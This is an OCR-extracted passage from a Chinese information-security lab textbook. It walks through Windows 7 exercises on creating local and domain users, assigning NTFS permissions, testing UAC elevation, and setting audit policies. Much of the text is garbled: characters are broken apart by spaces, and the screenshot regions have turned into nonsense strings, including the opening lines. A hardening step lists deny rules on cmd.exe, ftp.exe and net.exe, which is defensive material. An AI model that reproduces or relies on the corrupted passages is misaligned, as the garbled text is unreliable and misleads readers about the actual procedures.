入 文件 四 操作 各 查看 WD 收 闻 夹 O) 窗口 和 才 助 0 。 二 | 可 | | 
中 省 | 外 | 国 | 妃 | 岛 力 


加 | 第 中 ， 
现 市 梳 策 喇 更 改 

| 网 市 校 辣 录 事 件 

必 六 审核 对 象 访问 

目 | 审核 过 程 亿 路 
避 审 核 目录 服务 访问 

吏 审 核 特 权 使 用 

国 ， 哆 审核 系统 事件 
辆 审核 账户 登录 事件 

吏 审 核 账户 管理 


| 和 机 的 安全 第 中 设置 [解释 此 设置 
ED 设备 : 未 签名 驱动 程序 的 安装 操作 
+ 


这 个 设置 只 影响 数据 库 。 它 不 改变 当前 的 计算 机 设置 。 


CD 
图 8-15 ”安全 策略 差异 的 具体 信息 


82 用户 管 理 


8.2.1 创建 和 管理 用 户 账户 

【实验 目的 】 

掌握 使 用 计算 机 管理 工具 管理 本 地 用 户 账 户 的 方法 ， 了 解 Windows 7 中 账户 的 命名 
规则 和 口令 要 求 。 

【原理 简介 】 


在 Windows 7 上， 用户 管理 对 于 系统 和 组 安全 性 非常 关键 ， 在 组 内 部 ， 应 该 存在 用 
来 确定 每 个 新 用 户 应 该 具有 的 正确 权限 的 正确 过 程 ， 当 用 户 离开 组 时 ， 应 该 具有 保证 用 
户 不 能 再 访问 系统 的 过 程 。 
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1. 了 解 用 户 账户 

微软 Windows 7 提供 三 种 类 型 的 用 户 账户 :本 地 用 户 账户 、 域 用 户 账户 和 内 置 用 户 
账户 。 本 地 用 户 账户 允许 用 户 登 录 到 一 台 特 定 的 计算 机 上 ， 从 而 可 以 访问 该 计算 机 上 的 
资源 。 域 用 户 账户 允许 用 户 登录 到 域 中 从 而 可 以 访问 网 络 中 的 资源 。 内 置 用 户 账户 允许 
用 户 执 行 管理 任务 或 者 访问 本 地 和 网 络 资源 。 

一 般 的 Administrator 账户 不 能 被 删除 ， 在 实际 应 用 时 为 了 提高 安全 性 应 更 改 
Administrator 账户 名 。 使 用 不 标识 为 Administrator 账户 身份 的 名 称 ， 可 以 提高 系统 安全 
性 ， 其 他 用 户 因为 不 知道 哪个 用 户 账户 是 Administrator 账户 ， 而 增加 入 侵 难 度 。 

使 用 内 置 的 Guest 账户 给 予 临 时 性 的 用 户 登 录 和 访问 资源 的 能 力 。 Guest 账户 默认 是 
禁止 的 ， 只 能 在 安全 性 低 的 网 络 中 使 用 Guest 账户 。 

2. 账户 规则 

在 创建 新 用 户 前 应 当 了 解 Windows 7 对 用 户 命名 的 规范 和 口令 要 求 ， 了 解 这 些 内 容 
可 以 简化 账户 的 创建 过 程 。 

1) 命名 规范 

命名 规范 确定 域 中 的 用 户 是 如 何 被 标识 的 ， 一 个 好 的 命名 规范 可 以 帮助 管理 员 和 用 
户 管理 好 用 户 登 录 名 称 。 常 见 的 命名 规范 考虑 如 表 8-1 所 示 。 


表 8-1 命名 规范 考虑 


考 虑 说 明 
用 户 登 录 名 称 必须 是 | 本 地 用 户 账户 应 该 在 创建 这 个 本 地 用 户 账户 的 计算 机 上 是 唯一 的 。 域 用 户 账 
唯一 的 户 的 登录 名 称 在 目录 中 应 该 是 唯一 的 


用 户 名 称 可 以 包括 多 达 20 个 大 写 或 小 写 的 字符 , 虽然 用 户 名 称 可 以 超过 20 
最 多 使 用 20 个 字符 。 | 个 字符 ， 但 是 Windows 只 识别 前 20 个 字符 


避免 使 用 无 效 字符 以 下 字符 是 无 效 的 : “/|[]:;|=,+*?<> 
用 户 登 录 名 不 区 分 大 | 可 以 使 用 特殊 符号 和 字母 数字 的 结合 唯一 地 标识 用 户 账户 。 用 户 登 录 名 称 对 


小 写 大 小 写 不 敏感 ， 但 是 Windows 7 保留 大 小 写 

用 户 名 字 相 同 的 情况 “| 如 果 用 户 的 名 称 相 同 ， 必 须 加 以 区 分 

表明 用 户 类 型 可 以 通过 用 户 名 称 标识 用 户 类 型 ， 在 用 户 的 登录 名 前 加 一 个 标识 
2) 口令 要 求 


为 了 保护 对 计算 机 的 访问 ， 每 个 用 户 必 须 有 口令 ， 对 于 口令 有 以 下 要 求 。 

e 一 定 为 Administrator 账户 指定 一 个 安全 的 口令 ， 阻 止 未 授权 的 用 户 访问 这 个 
账户 。 

e 决定 是 Administrator 还 是 用 户 自 己 控制 口令 , 可 以 为 用 户 账户 分 配 一 个 唯一 的 口 
令 并 阻止 用 户 更 改 它 , 或 者 允许 用 户 在 第 一 次 登录 时 输入 自己 的 口令 。 在 大 多 数 
情况 下 ， 用 户 可 以 控制 自己 的 口令 。 

e 使 用 难以 猜测 的 口令 。 例 如 避免 使 用 和 用 户 名 称 明显 相关 的 口令 。 

e 口令 可 以 多 达 128 个 字符 ， 推 荐 使 用 最 少 8 个 字符 的 口令 。 

e 使 用 大 写 和 小 写 、 数 字 和 有 效 的 非 字母 符号 进行 结合 的 口令 。 
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【实验 环境 】 

Windows 7 操作 系统 。 

【实验 步骤 】 

1. 添加 管理 本 地 用 户 

(1) 以 系统 管理 员 的 身份 登录 到 Windows 系统 ， 通 过 【控制 面板 】| 【管理 工具 】| 
【计算 机 管理 】 进 入 计算 管理 界面 。 单 击 左 侧 的 本 地 用 户 和 组 界面 ， 出 现 如 图 8-16 所 示 
的 界面 。 


局 [日 丽 

名 称 全 名 搞 述 

赤 _vmware_u... _vmware_u... VMware User 

弹 Administrat- 管理 计算 机 ( 域 ) 的 内 置 账户 

弹 Guest 供 来 宾 访 问 计算 机 或 访问 域 的 内 … 


好 peter 


图 8-16 用户 管理 界面 


(2) 从 【本 地 用 户 和 组 】 中 选择 【用 户 】 条 目 。 然 后 从 【操作 】 菜 单 中 选择 【新 用 
户 】， 如 图 8-17 所 示 弹 出 【新 用 户 】 对 话 框 。 添 加 用 户 名 为 test， 全 名 为 testuser， 描 述 
为 test user， 密 码 为 testabc。 如 果 在 密码 策略 中 启用 了 复杂 性 密码 要 求 ， 这 时 系统 会 提 
示 密 码 不 符合 复杂 性 要 求 , 需要 按照 密码 复杂 性 要 求 选择 密码 。 每 一 个 新 用 户 ID 都 应 该 
拥有 初始 密码 ， 并 且 应 该 选 定 【 用 户 下 次 登录 时 须 更 改 密码 】。 


“nr = 


措 述 四 ): 


密码 中): 
确认 密码 : 
贺 用 户 下 次 登录 时 须 更 改 密码 如 


口 用 户 不 能 更 改 密码 @) 
口 密码 永 不 过 期 如 


图 8-17 添加 新 用 户 


(3) 为 当前 用 户 选 择 合适 的 组 , 默认 的 当前 用 户 属于 users 组 , 下面 提升 test 的 权限 ， 
将 其 放 入 Power User 组 中 ， 有 两 种 方法 。 方 法 一 为 单 击 左 侧 项 目 中 的 【组 】 浏览 系统 
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当前 的 用 户 组 ， 如 图 8-18 所 示 。 


竹 Backup Operators 。 备份 授 作 员 为 了 备份 或 还 原文 件 - 
竹 Cryptographic Oper- 授权 成 员 执行 加 密 扫 作 . 

考 Distributed COM Us.。 成 员 允 许 启动 、 激 活 和 使 用 此 计 . 
者 Event Log Readers 。 此 8 的 成 员 可 以 从 本 地 计算 机 中 
图 Guests 按 紧 认 值 ,来宾 跟 用 户 组 的 成 员 .… 
者 Is IUsrs Internet 信息 服务 使 用 的 内 署 组. 
短 Network Configurat-。 此 组 中 的 成 员 有 部 分 管理 权限 来 .… 
图 Performance Log U.。 该 组 中 的 成 员 可 以 计划 进行 性 能 … 
手 Performance Monit 。 此 如 的 成 员 可 以 从 本 地 和 远程 沪 . 
纤 Power Users 包括 高 级 用 户 以 向 下 式 容 , 高 级- 
轿 Remote Desktop Us.。 此 组 中 的 成 员 被 授予 远 程 登 录 的 .. 


图 8-18 用 户 组 


(4) 双击 右 侧 的 Power Users， 编 辑 当前 组 成 员 ， 单 击 【 添 加 】 按 钮 ， 出 现 如 图 8-19 
所 示 界 面 ， 在 上 方 的 栏目 中 选择 test 用 户 ， 然 后 单 击 【添加 】 按 钮 ， 然 后 再 单 击 【确定 】 
按钮 ， 就 可 以 把 test 加 入 到 Power Users 中 。 


8-19 选择 组 


(5) 方法 二 为 右 击 新 创建 的 用 户 ， 然 后 选择 【属性 】 选择 【隶属 于 】 选 项 卡 ， 出 现 
如 图 8-20 所 示 界 面 ， 将 相应 组 添加 到 列表 中 。 


图 8-20 添加 用 户 到 组 中 
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2. 添加 域 用 户 

(1) 以 Domain Admins 组 成 员 的 身份 登录 Windows Server 系统 ， 然 后 打开 【控制 面 
板 】|【 管 理工 具 】|【Active Directory 用 户 和 计算 机 】。 

(2) 右 击 User 选项 ， 单 击 【新 建 】 再 单 击 【用 户 】， 如 图 8-21 所 示 。 


ectory 用 户 和 计算 机 


| 用 控制 8(O 窗 Du 和 助 由 | =lelzl 
| 拘 作 人 查看 由 | 外 二 | 固 | 因 | 区 团 四 图 | 芒 儿 溉 还 澳 了 通 瓣 
宰 | [es 及 


图 8-21 新 建 用 户 
(3) 输入 【名 】【 姓 】 以 及 【用 户 登 录 名 】 如 图 8-22 所 示 ， 然 后 单 击 【下 一 步 】。 
Ed 


© 创建 在 :hsian_ con/Vsers 


Jiocment eaian con 了 
用 户 登 录 名 (findows 2000 以 前 版 本 ) @) 


SE 取消 


图 8-22 ”输入 用 户 信息 
(4) 输入 并 确认 用 户 密码 ， 清 除 【 用 户 下 次 登录 时 须 更 改 密码 】 复 选 枉 ， 如 图 8-23 


所 示 ， 然 后 单 击 【 下 一 步 】。 

(5) 完成 后 , 在 右 侧 栏 中 找到 刚 加 入 的 用 户 document, 双击 出 现 该 用 户 的 属性 信息 ， 
如 图 8-24 所 示 。 可 以 进一步 填写 document 的 详细 信息 。 单 击 【 成 员 属 于 】 标 签 ， 可 以 
修改 用 户 所 属 的 组 ， 修 改 用 户 的 权限 。 
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EEEEEED _ | 


[而 创 奸 在 :haian eon/Vsers 


密码 到 ): FE 
确认 密码 CC): Fes 
厂 用 户 下 次 登录 时 须 更 改 密码 旭 

厂 用 户 不 能 更 改 密码 G) 

灰 密码 永 不 过 期 @) 

厂 账户 已 停 用 @) 


sw mm | 


图 8-23 输入 密码 


拟 入 | 环境 | 会 话 | 远程 控制 | 终端 服务 配置 文件 | 
常规 | 地 址 | 账户 | 配置 文件 | 电话 | 单位 成员 属于 


隶属 于 中 ) : 


Active Directory 文件 坎 
hai an com/VUsers 


Domain Users 


wo | 
主要 组 : Domain Users 
设置 主要 组 (8) me Nacintosh 


确定 “| 。 取消 所 用 区 
图 8-24 用 户 的 属性 


【实验 报告 】 

(1) 加 入 本 地 用 户 的 过 程 ， 并 使 用 该 用 户 登录 系统 进行 权限 测试 。 

(2) 加 入 域 用 户 的 过 程 ， 并 使 用 该 用 户 登 录 域内 不 同 的 系统 进行 权限 测试 。 
【思考 题 】 

如 何 使 用 安全 策略 对 域 用 户 的 权限 进行 限制 ? 


8.2.2 ”授权 管理 


【实验 目的 】 
掌握 Windows 系统 下 的 授权 管理 ， 了 解 Windows 访问 控制 机 制 和 授权 原则 。 
【原理 简介 】 


访问 控制 是 批准 用 户 、 组 和 计算 机 访问 网 络 上 的 对 象 的 过 程 。 构 成 访问 控制 的 主要 
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概念 是 权限 、 用 户 和 对 象 审查 。 权 限定 义 了 授予 用 户 或 组 对 某 个 对 象 或 对 象 属性 的 访问 
类 型 。 权 限 可 以 应 用 到 任何 受 保护 的 对 象 ， 如 文件 、Active Directory 或 注册 表 。 权 限 可 
以 授予 任何 用 户 、 组 或 计算 机 。 附 加 在 对 象 上 的 权限 取决 于 对 象 的 类 型 。 例 如 ， 附 加 给 
文件 的 权限 与 附加 给 注册 表 项 的 权限 不 同 。 但 是 ， 某 些 权限 对 于 大 多 数 类 型 的 对 象 都 是 
公用 的 。 这 些 公用 权限 有 : 读 取 权 限 、 修 改 权限 、 更 改 所 有 者 、 删 除 。 

授权 就 是 为 组 和 用 户 指定 访问 级 别 。 例 如 ， 可 以 允许 一 个 用 户 读 取 文 件 的 内 容 ， 允 
许 另 一 个 用 户 修改 该 文件 ， 同 时 防止 所 有 其 他 用 户 访问 该 文件 。 如 果 需 要 更 改 个 别 对 象 
的 权限 ， 只 要 启动 适当 的 工具 和 更 改 对 象 的 属性 即 可 。 

1. 权限 及 用 户 授权 的 最 佳 操作 

(1) 将 权限 指派 给 组 而 不 是 用 户 。 由 于 直接 维持 用 户 账 户 效率 不 高 ， 因 此 最 好 不 要 
将 权限 直接 指派 给 用 户 。 

(2) 应 在 特定 的 特殊 情况 下 使 用 拒绝 权限 。 使 用 “拒绝 ”权限 来 排除 拥有 “允许” 
权限 的 组 的 子 集 。 如 果 已 经 将 完全 控制 授予 用 户 或 组 ， 请 使 用 “拒绝 ”来 排除 一 个 特殊 
的 权限 。 

(3) 应 尽 可 能 使 用 安全 模板 ， 而 不 是 设置 个 别 权 限 。 

(4) 如 果 可 能 ， 应 避免 更 改 文件 系统 对 象 〈 尤 其 是 系统 文件 夹 和 根 文 件 夹 ) 的 默认 
权限 项 。 更 改 默 认 权限 可 导致 意外 访问 问题 或 降低 安全 性 。 

(5) 永远 也 不 要 拒绝 Everyone 组 访问 对 象 。 如 果 拒 绝对 于 某 个 对 象 的 Everyone 访 
问 权限 ， 那 将 包括 管理 员 。 较 好 的 解决 方法 是 删除 Everyone 组 ， 只 要 授予 其 他 用 户 、 组 
或 计算 机 对 于 该 对 象 的 访问 权限 即 可 。 

(6) 尽 可 能 为 树 上 的 高 层次 对 象 指派 权限 ， 然 后 应 用 继承 以 通过 树 传播 安全 设置 。 
可 以 快速 而 且 有 效 地 对 父 对 象 的 所 有 子 对 象 或 子 树 应 用 访问 控制 设置 。 通 过 这 一 操作 ， 
可 以 以 最 少 的 工作 获得 最 大 的 效果 。 建 立 的 权限 设置 对 于 大 多 数 用 户 、 组 和 计算 机 来 说 
应 该 是 足够 的 。 

NTFS 文件 系统 是 Windows NT 内 核 的 系列 操作 系统 支持 文件 系统 ,是 特别 为 网 络 和 
磁盘 配额 、 文 件 加 密 等 管理 安全 特性 设计 的 磁盘 格式 。 使 用 NTFS 权限 能 够 指定 哪些 用 
户 和 组 能 够 访问 文件 和 文件 夹 ， 以 及 能 够 对 这 个 文件 和 文件 夹 的 内 容 做 什么 。NTFS 针 
对 NTFS 卷 上 的 每 个 文件 和 文件 夹 存 储 一 个 访问 控制 列表 ACL。ACL 包括 已 经 被 授予 对 
文件 或 者 文件 夹 访问 的 所 有 用 户 账户 和 组 的 一 个 列表 ， 以 及 授予 他 们 的 访问 类 型 。 当 使 
用 NTFS 格式 化 一 个 卷 时 ， 完 全 控制 的 权限 指派 给 Everyone 组 ， 为 了 安全 应 该 更 改 默认 
的 权限 并 指派 其 他 合适 的 NTFS 权限 控制 用 户 对 资源 的 访问 。 

2. 目录 权限 的 分 配 的 最 佳 操作 

(1) 除 系统 所 在 分 区 之 外 的 所 有 分 区 都 赋予 Administrators 和 SYSTEM 有 完全 控制 
权 , 之 后 再 对 其 下 的 子 目 录 作 单独 的 目录 权限 ， 如 Web 站 点 目录 ， 要 为 其 目录 权限 分 配 
一 个 与 之 对 应 的 匿名 访问 账号 并 赋予 它 有 修改 权限 ， 如 果 想 使 网 站 坚固 ， 可 以 分 配 只 读 
权限 并 对 特殊 的 目录 作 可 写 权 限 。 

(2) 系统 所 在 分 区 下 的 根 目录 都 要 设置 为 不 继承 父 权 限 ， 之 后 为 该 分 区 只 赋予 
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Administrators 和 SYSTEM 有 完全 控制 权 。 

(3) 因为 服务 器 只 有 管理 员 有 本 地 登录 权限 ， 所 在 要 配置 Documents and Settings 这 
个 目录 权限 只 保留 Administrators 和 SYSTEM 有 完全 控制 权 , 其 下 的 子 目 录 同 样 。 另 外， 
别 忘记 还 有 一 个 隐藏 目录 也 需要 同样 操作 。 

(4) 配 置 Program files 目录 ,为 Common Files 目录 之 外 的 所 有 目录 赋予 Administrators 
和 SYSTEM 有 完全 控制 权 。 

(5) 配置 Windows 根 目 录 ， 进 入 SYSTEM32 目录 下 ， 将 cmd.exe、ftp.exe、net.exe、 
scrrun.dll、shell.dll 这 些 程序 赋予 匿名 账号 拒绝 访问 。 

UAC (User Account Control， 用 户 账户 控制 ) 是 微软 为 提高 系统 安全 而 在 Windows 
Vista 中 引入 的 新 技术 , 它 要 求 用 户 在 执行 可 能 会 影响 计算 机 运行 的 操作 或 执行 更 改 影响 
其 他 用 户 的 设置 的 操作 之 前 ， 提 供 权限 或 管理 员 密 码 。 通 过 在 这 些 操作 启动 前 对 其 进行 
验证 , UAC 可 以 帮助 防止 恶意 软件 和 间谍 软件 在 未 经 许可 的 情况 下 在 计算 机 上 进行 安装 
或 对 计算 机 进行 更 改 。UAC 集成 了 一 系列 技术 ， 其 中 包括 文件 系统 和 注册 表 虚 拟 化 、 受 
保护 的 系统 管理 员 (PA) 账户、UAC 提升 权限 提示 ， 以 及 支持 这 些 目标 的 Windows 完 
整 性 级 别 。 


【实验 环境 】 
Windows 7 操作 系统 。 


【实验 步骤 】 

1. 更 改 系统 默认 权限 

(1) 进入 系统 分 区 所 在 的 硬盘 , 右 击 Windows 目录 , 单 击 【属性 】 菜单, 出 现 【Windows 
属性 】 对 话 框 ， 单 击 【安全 】 标 签 ， 出 现 如 图 8-25 所 示 界 面 。 


E77 ES 
对 象 名 称 : C:\Windows 


组 或 用 户 名 @) 
号 SrsTEn 
中 Adninistrators (peter-PC\Administrators) 


了 或 训 级 设置 ， 请 单 击 “ 高 。 高 加 WW 
了 了解 访问 控制 和 权限 


CE 
图 8-25 WINNT 文件 夹 的 属性 
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(2) 单 击 【高 级 】 按 钮 ， 出 现 如 图 8-26 所 示 的 界面 ， 选 中 相应 的 用 户 组 名 称 ， 单 击 
【查看 /编辑 】 按 钮 就 可 编辑 相应 用 户 组 的 权限 ， 如 图 8-27 所 示 对 Users 的 权限 进行 编辑 。 
Cx) 


若 要 查看 某 个 权限 项 目的 详细 信息 ， 请 双击 该 项 目 。 若 要 修改 权限 ， 请 单 击 “ 更 改 权限 ”。 


对 象 名 称 : C: MWindows 


Adninistrators (pe 
Administrators (pe... 
Vsers (peter-PC\Ws... i 


CREATOR OWWER 特殊 仅 子 文件 夹 和 文件 


于 二] | | 
图 8-26 ”权限 编辑 


名 称 @0: Users (peter-PC\Vsers) 
应 用 于 Q) :[ 此 文件 夹 、 子 文件 夹 和 文件 
权限 EE): 

完全 控制 

遍历 文件 来 /执行 文件 


管理 权限 


图 8.27 Users 的 权限 修改 
2. 设置 文件 权限 
CD 在 CatesN 下 建立 一 个 文本 文件 ， 名 称 为 “机 密 文件 .xt”， 右 击 文件 ， 单 击 【 属 


性 】 菜单， 出 现 其 属性 对 话 框 ， 单 击 【 安 全 】 标 签 ， 出 现 如 图 8-28 所 示 对 话 框 。 
(2) 单 击 【 高 级 】 按 钮 ， 出 现 如 图 8-29 所 示 界 面 ， 单 击 【查看 /编辑 】 按 钮 ， 删 除 
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User 的 修改 权限 。 


对 象 名 称 : CMtest\ 机 密 文件 . txt 


对 象 名 称 : Ci\test\ 机 密 文件 . txt 
MAdninistrators (peter-PC\Adninistrators) 组 或 用 户 名 @) 
妮 Users (peter-PC\Vsers) 柄 ithenticated Users 

SYSTEN 


总 
要 更 改 权限 ， 请 单 击 “编辑 ”。 本 | 中 Adninistrators (peter-PC\Adninistrators) 
es Vsers 的 权限 _ Users @eter-FCVUsers) 


是 
3 


bs inne 请 单 击 “ 高 [高 经 GO 


回回 回回 图 


卫 稻 访问 控制 和 权限 


蕊 啶 一 ] 二 3 


图 8-28 ”机密 文件 的 安全 属性 图 8-29 机密 文件 的 访问 控制 设置 


(3) 单 击 【添加 】 按 钮 ， 添 加 用 户 test， 单 击 【 确 定 】。 
(4) 为 test 用 户 授权 ， 如 图 8-30 所 示 ， 完 成 后 单 击 【确定 】。 
(5) 修改 后 的 “机 密 文件 .txt” 的 安全 属性 如 图 8-31 所 示 ， 只 有 用 户 test 有 读 写 权限 。 


对 象 名 称 : 。C:\test\ 机 密 文 件 . txt 
组 或 用 户 名 @) : 

对 象 名 称 。 。C:\test\ 机 密 文件 . txt 想 huthenticated Users 

组 或 用 户 名 @@) tes st 
柄 Anthenticated Users MAdministrators (peter-PC\Adninistrators) 


跑 SrsTEn 四 Users (peter-FC\Users) 
Adninistrators (peter-PC\Adninistrators) 


test (PETER-PC\test) EE | 
柄 Users (peter-PC\Wsers) 拒绝 


可 训 设置 ， 请 单 击 “ 高 


回回 回 图 加 等 


了 韶 访 问 榨 利和 权限 


| 


图 8-30 ”编辑 test 用 户 的 权限 图 8-31 机 密 文件 的 属性 
使 用 其 他 用 户 名 登录 系统 ， 双 击 “ 机 密 文件 .txt” 进 行 编辑 ， 系 统 会 提示 权限 错误 。 
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3. UAC 权限 提升 实验 

在 安装 之 后 创建 的 账户 是 标准 用 户 账 户 ， 默 认 情况 下 ， 这 些 账 户 通过 一 个 “即时 权 
限 提升 ”提示 提供 提升 功能 ， 该 提示 要 求 提供 将 用 于 授予 管理 权限 的 管理 账户 的 凭据 。 
利用 这 一 便捷 功能 ， 只 要 共享 家 庭 计算 机 的 家 庭 成 员 或 更 注重 安全 的 使 用 标准 用 户 账户 
的 用 户 知道 管理 账户 的 密码 ， 他 们 就 能 够 用 管理 权限 来 运行 应 用 程序 ， 而 不 必 手动 切 换 
到 其 他 用 户 登录 会 话 。 此 类 应 用 程序 的 常见 示例 包括 安装 程序 以 及 家 长 控制 配置 。 

(1) 以 test 用户 登录 Windows 7 系统 , 单 击 屏幕 右 下 角 的 时 间 显 示 , 进入 详细 时 钟 显 示 ， 
然后 单 击 下 面 的 【更 改 时 间 和 日 期 设置 ]， 出 现 如 图 8-32 所 示 的 【日 期 和 时 间 】 对 话 框 。 


[3 
2011 年 8 月 10 日 


时 间 : 
23:40:06 


时 区 
(UTC+08:00) 北 京 ， 重 庆 ,香港 符 别 行政 区 ,乌鲁木齐 


| RNED.. 一 


基本 | 
图 8-32 【日 期 和 时 间 】 对话 杠 
(2) 单 击 【更 改 日 期 和 时间】， 系 统 用 户 账户 控制 功能 会 弹出 权限 提升 提示 ,如 图 8-33 所 示 。 


DTEED 妆 
人 nu"< 得 要 处 的 许可 才能 继续 


- 间 
: Merosoft Windows 


着 要 继续 ， 请 输入 管理 员 密 码 ， 然 后 单 击 “ 确 定 ”。 


加 | Administrator 


图 8-33 用户 账户 控制 
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(3) 按照 提示 输入 Administrator 的 密码 , 单 击 【确定 】 即 可 进入 如 图 8-34 所 示 的 【日 
期 和 时 间 设 置 】 界 面 。 


2011 年 明 
目 三 .三 -三 轿 ,. 到 : 痰 
31 1234556 
7 8 9 国 11 12 13 
14 15 16 17 18 19 20 


21 22 23 24 25 26 27 


28293031 1 2 3 
45678 910 


图 8-34 ”设置 系统 时 间 


【实验 报告 】 
(1) 作为 练习 请 按照 上 述 方式 实现 实验 目的 中 列 出 的 目录 权限 分 配 。 在 开始 练习 前 ， 
创建 如 下 用 户 和 组 。 


组 用 户 上 账户 
Managers UserT1 属于 Managers 
UserT2 属于 Accounting 
UserT3 属于 Managers 和 Accounting 
Accounting UserT4 不 属于 Managers 和 Accounting 
创建 以 下 文件 夹 : 
Ci\Public Ci\Apptest 
Ci:\Public\Library C:\ Apptest\Database 
C:\Public\Manuals C:\ Apptest \Spreadsheet 
C:\ ublic\Library\Misc C:\ Apptest \WordProcessing 
实现 如 下 权限 分 配 。 
e 所 有 用 户 能 够 允许 WordProcessing 文件 夹 中 的 程序 ， 但 是 他 们 不 能 更 改 内 部 的 
文件 。 


e 所 有 用 户 能 够 读 取 Public 文件 夹 中 的 文件 以 及 在 该 文件 中 创建 文件 。 
e 所 有 用 户 应 该 禁止 在 文件 夹 Public\Library 中 更 改 文件 。 
e 只 有 UserT1 能 够 更 改 和 删除 PubliwManuals 文件 中 的 文件 。 


87 


ee 信息 系统 安全 实验 教程 ”mm 


(2) 对 如 下 列 出 的 文件 夹 指派 合适 的 权限 。 


文件 夹 名 称 用 户 账户 或 者 组 权 限 

Public Users 组 Read & Execute 
Administrator 由 Full Control 

Public\Library Users 组 Read & Execute 
Administrator 纪 Full Control 
Managers 组 Modify 

Public\Library\Misc Users 组 Read & Execute 
Administrator 由 Full Control 
UserT2 组 Modify 

Public\ Manuals Users 组 Read & Execute 


Administrator 由 Full Control 
Accounting 组 Modify 


权限 设置 完成 后 ， 分 别 以 用 户 UserT1、UserT2、UserT3、Usert4 和 Administrator 登 
录 系 统 ， 并 测试 相应 目录 的 读 写 〈 创 建文 件 )、 更 改 和 执行 权限 ， 体 会 Windows 授权 管 
理 的 作用 。 

【思考 题 】 

(1) 分 析 Windows 7 系统 所 使 用 的 访问 控制 模型 。 

(2) 用 户 账户 控制 功能 对 于 病毒 防御 有 何 用 途 ? 


83 安全 风险 分 析 


8.3.1 系统 审核 


【实验 目的 】 

掌握 Windows 下 审核 策略 的 设置 方法 ， 了 解 审核 策略 的 制定 准则 。 掌 握 如 何 使 用 事 
件 查 看 器 查看 审核 日 志和 审核 事件 ， 掌 握 事件 查看 器 的 一 般 用 法 。 

【原理 简介 】 

每 当 用 户 执行 了 指定 的 某 些 操作 ， 审 核 日 志 就 会 记录 一 个 审核 项 。 例 如 ， 修 改 文件 
或 策略 可 以 触发 一 个 审核 项 。 审 核 项 显示 了 所 执行 的 操作 、 相 关 的 用 户 账户 以 及 该 操作 
的 日 期 和 时 间 。 作 为 企业 风险 管理 项 目的 一 部 分 ， 定 期 审核 操作 可 以 使 管理 员 跟踪 并 确 
保 每 个 计算 机 有 足够 的 安全 级 别 。 安 全 审核 对 于 任何 企业 系统 来 说 都 极其 重要 。 

审核 策略 用 于 确定 计算 机 的 安全 性 事件 日 志 中 记录 了 哪些 安全 事件 。 能 够 审核 的 事 
件 类 型 包括 : 对 文件 和 文件 夹 的 访问 、 登 录 以 及 退出 登录 、 关 闭 以 及 重新 启动 计算 机 ， 
对 用 户 和 组 的 改动 。 对 审核 事件 的 成 功 或 者 事件 的 失败 或 者 两 者 都 审核 ， 跟 踪 成 功 事件 
可 以 决定 用 户 对 特定 文件 或 者 打印 机 的 访问 ， 能 够 利用 该 信息 计划 资源 。 跟 踪 失 败 事件 
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以 寻找 可 能 出 现 的 安全 破坏 。 安 全 审核 的 内 容 应 该 包括 以 下 方面 。 

1. 审核 账户 登录 事件 

该 审核 用 于 确定 是 否 对 用 户 在 计算 机 上 登录 或 注销 的 每 个 实例 进行 审核 。 如 果 定义 
了 该 策略 设置 ， 则 可 指定 是 否 审核 成 功 、 失 败 或 根本 不 审核 此 事件 类 型 。 成 功 审核 会 在 
账户 登录 尝试 成 功 时 生成 一 个 审核 项 ， 可 用 来 确定 哪个 人 成 功 登 录 到 哪 台 计算 机 。 失 败 
审核 会 在 账户 登录 尝试 失败 时 生成 一 个 审核 项 ， 该 审核 项 对 于 入 侵 检测 十 分 有 用 ， 但 此 
设置 可 能 会 导致 拒绝 服务 (DoS ) 状态 ， 因 为 攻击 者 可 以 生成 数 百 万 次 登录 失败 ， 并 将 
安全 事件 日 志 填 满 。 
2. 审核 账户 管理 
“审核 账户 管理 ”设置 用 于 确定 是 否 对 计算 机 上 的 每 个 账户 管理 事件 进行 审核 。 账户 
事件 的 示例 包括 : 
e 创建 、 修 改 或 删除 用 户 账 户 或 组 。 
e 重 命 名 、 禁 用 或 启用 用 户 账户 。 
e 设置 或 修改 密码 。 
在 响应 安全 事件 时 ， 组 织 可 以 对 创建 、 更 改 或 删除 账户 的 人 员 进 行 跟踪 ， 这 一 点 非 
常 重要 。 

3. 审核 目录 服务 访问 

“审核 目录 服务 访问 ”设置 用 于 确定 是 否 对 用 户 访问 Microsoft Active Directory 对 象 
的 事件 进行 审核 ， 该 对 象 指定 了 自身 的 系统 访问 控制 列表 (SACL )。 

4. 审核 登录 事件 

“审核 登录 事件 ”设置 用 于 确定 是 否 对 用 户 在 记录 审核 事件 的 计算 机 上 登录 、 注 销 或 
建立 网 络 连接 的 每 个 实例 进行 审核 。 账 户 登 录 事 件 是 在 账户 所 在 的 位 置 生成 的 ， 而 登录 
事件 是 在 登录 尝试 发 生 的 位 置 生成 的 。 

5. 审核 对 象 访问 

“审核 对 象 访问 ”设置 用 于 确定 是 否 对 用 户 访问 指定 了 自身 SACL 的 对 象 〈 如 文件 、 
文件 夹 、 注 册 表 项 和 打印 机 等 ) 这 一 事件 进行 审核 。 如 果 定 义 了 此 策略 设置 ， 则 可 指定 
是 否 审核 成 功 、 审 核 失败 或 根本 不 审核 此 事件 类 型 。 如 果 启 用 审核 对 象 访 问 并 在 对 象 上 
配置 SACL， 可 以 在 企业 系统 上 的 安全 日 志 中 生成 大 量 审核 项 ， 因 此 ， 仅 在 确实 要 使 用 
记录 的 信息 时 才 应 启用 这 些 设 置 。 

6. 审核 策略 更 改 

“审核 策略 更 改 ” 设置 用 于 确定 是 否 对 更 改 用 户 权限 分 配 策略 、 审 核 策 略 或 信任 策略 
的 每 个 事件 进行 审核 。 如 果 定 义 了 此 策略 设置 ， 则 可 指定 是 否 审核 成 功 、 审 核 失 败 或 根 
本 不 审核 此 事件 类 型 。 成 功 审核 会 在 成 功 更 改 用 户 权限 分 配 策略 、 审 核 策略 或 信任 策略 
时 生成 一 个 审核 项 ， 该 审核 项 的 信息 对 于 计 账 以 及 事件 发 生 后 的 辩论 十 分 有 用 ， 可 用 来 
确定 谁 在 域 或 单个 计算 机 上 成 功 修改 了 策略 。 失 败 审核 会 在 对 用 户 权限 分 配 策略 、 审 核 
策略 或 信任 策略 的 更 改 失败 时 生成 一 个 审核 项 。 


或 
总 
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7. 审核 特权 使 用 

“审核 特权 使 用 ”设置 用 于 确定 是 否 对 用 户 行使 用 户 权限 的 每 个 实例 进行 审核 。 如 果 
定义 了 此 策略 设置 ， 则 可 指定 是 否 审核 成 功 、 审 核 失 败 或 根本 不 审核 此 事件 类 型 。 启 用 
